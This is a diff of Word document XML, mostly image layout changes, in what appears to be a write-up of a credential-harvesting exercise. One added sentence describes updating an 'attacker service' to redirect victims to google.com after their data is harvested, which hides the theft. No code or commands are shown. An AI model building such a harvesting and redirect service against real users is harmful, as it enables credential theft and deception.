+                        <pic:cNvPr id="4688042" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId24"/>
+                        <a:blip r:embed="rId23"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2647991"/>
+                          <a:ext cx="6858000" cy="3007366"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2123,50 +1474,76 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i14" o:spid="_x0000_s14" type="#_x0000_t75" style="width:540.00pt;height:208.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId24" o:title=""/>
+              <v:shape id="_x0000_i14" o:spid="_x0000_s14" type="#_x0000_t75" style="width:540.00pt;height:236.80pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId23" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2395282"/>
+                <wp:extent cx="6858000" cy="2305373"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="16" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -2176,20 +1553,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="479251271" name=""/>
+                        <pic:cNvPr id="1250256772" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId25"/>
+                        <a:blip r:embed="rId24"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2395281"/>
+                          <a:ext cx="6857999" cy="2305372"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2222,50 +1599,43 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i15" o:spid="_x0000_s15" type="#_x0000_t75" style="width:540.00pt;height:188.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId25" o:title=""/>
+              <v:shape id="_x0000_i15" o:spid="_x0000_s15" type="#_x0000_t75" style="width:540.00pt;height:181.53pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId24" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1702383"/>
+                <wp:extent cx="6858000" cy="2011747"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="17" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -2275,20 +1645,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="767584049" name=""/>
+                        <pic:cNvPr id="1425034196" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId26"/>
+                        <a:blip r:embed="rId25"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="1702383"/>
+                          <a:ext cx="6858000" cy="2011746"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2321,75 +1691,56 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i16" o:spid="_x0000_s16" type="#_x0000_t75" style="width:540.00pt;height:134.05pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId26" o:title=""/>
+              <v:shape id="_x0000_i16" o:spid="_x0000_s16" type="#_x0000_t75" style="width:540.00pt;height:158.41pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId25" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <w:t xml:space="preserve">But it forwarded me to the form page. So, i will update the attacker service to redirect to google.com once the data has been harvested.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="3363810"/>
+                <wp:extent cx="6858000" cy="1208552"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="18" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -2399,20 +1750,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1919394068" name=""/>
+                        <pic:cNvPr id="528378892" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId27"/>
+                        <a:blip r:embed="rId26"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="3363809"/>
+                          <a:ext cx="6858000" cy="1208552"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2445,7 +1796,88 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i17" o:spid="_x0000_s17" type="#_x0000_t75" style="width:540.00pt;height:264.87pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i17" o:spid="_x0000_s17" type="#_x0000_t75" style="width:540.00pt;height:95.16pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId26" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="1117352"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="19" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1613002569" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId27"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="1117352"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i18" o:spid="_x0000_s18" type="#_x0000_t75" style="width:540.00pt;height:87.98pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId27" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -2453,1266 +1885,858 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="2985650"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="20" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1109239658" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId28"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="2985649"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i19" o:spid="_x0000_s19" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId28" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="2985650"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="21" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="1933883955" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId29"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6858000" cy="2985649"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
+                  <v:f eqn="prod @7 21600 pixelWidth"/>
+                  <v:f eqn="sum @8 21600 0"/>
+                  <v:f eqn="prod @7 21600 pixelHeight"/>
+                  <v:f eqn="sum @10 21600 0"/>
+                </v:formulas>
+                <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                <o:lock v:ext="edit" aspectratio="t"/>
+              </v:shapetype>
+              <v:shape id="_x0000_i20" o:spid="_x0000_s20" type="#_x0000_t75" style="width:540.00pt;height:235.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId29" o:title=""/>
+                <o:lock v:ext="edit" rotation="t"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="6858000" cy="2123255"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:docPr id="22" name=""/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:nvPicPr>
+                        <pic:cNvPr id="2026477909" name=""/>
+                        <pic:cNvPicPr>
+                          <a:picLocks noChangeAspect="1"/>
+                        </pic:cNvPicPr>
+                        <pic:nvPr/>
+                      </pic:nvPicPr>
+                      <pic:blipFill rotWithShape="1">
+                        <a:blip r:embed="rId30"/>
+                        <a:stretch/>
+                      </pic:blipFill>
+                      <pic:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6857999" cy="2123254"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                      </pic:spPr>
+                    </pic:pic>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                  <v:f eqn="sum @0 1 0"/>
+                  <v:f eqn="sum 0 0 @1"/>
+                  <v:f eqn="prod @2 1 2"/>
+                  <v:f eqn="prod @3 21600 pixelWidth"/>
+                  <v:f eqn="prod @3 21600 pixelHeight"/>
+                  <v:f eqn="sum @0 0 1"/>
+                  <v:f eqn="prod @6 1 2"/>
